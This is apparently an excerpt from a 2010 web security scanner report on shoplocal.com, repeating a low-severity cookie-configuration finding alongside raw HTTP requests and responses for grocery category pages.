<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browseonlineall.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=N; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:23 GMT Connection: close Content-Length: 132620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buns-rolls.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:30 GMT Connection: close Content-Length: 99227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /butter-margarine.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:26 GMT Connection: close Content-Length: 118878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cakes-pies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:15 GMT Connection: close Content-Length: 114015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /category.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:18 GMT Connection: close Content-Length: 113872
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:16 GMT Connection: close Content-Length: 165978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cheese-meats.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:55 GMT Connection: close Content-Length: 127011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:36 GMT Connection: close Content-Length: 153065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cleaning-supplies.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:34 GMT Connection: close Content-Length: 182336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clothing.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:16 GMT Connection: close Content-Length: 116567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coffee-tea.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:51:17 GMT Connection: close Content-Length: 167316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cooking-oil.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:07 GMT Connection: close Content-Length: 92620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /coupons.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0&couponclippings=; expires=Tue, 20-Nov-2035 18:40:50 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:51 GMT Connection: close Content-Length: 55906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cream-cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:23 GMT Connection: close Content-Length: 77658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dairy.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:25 GMT Connection: close Content-Length: 172175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deli.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:01 GMT Connection: close Content-Length: 157977
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dessert-mixes-frosting.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:09 GMT Connection: close Content-Length: 165032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eggs.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:21 GMT Connection: close Content-Length: 67078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /electronics.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:04 GMT Connection: close Content-Length: 118636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /flour-sugar.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:21 GMT Connection: close Content-Length: 96053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /formula.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:12 GMT Connection: close Content-Length: 75281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /juice.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:43 GMT Connection: close Content-Length: 162147
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /liquor.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
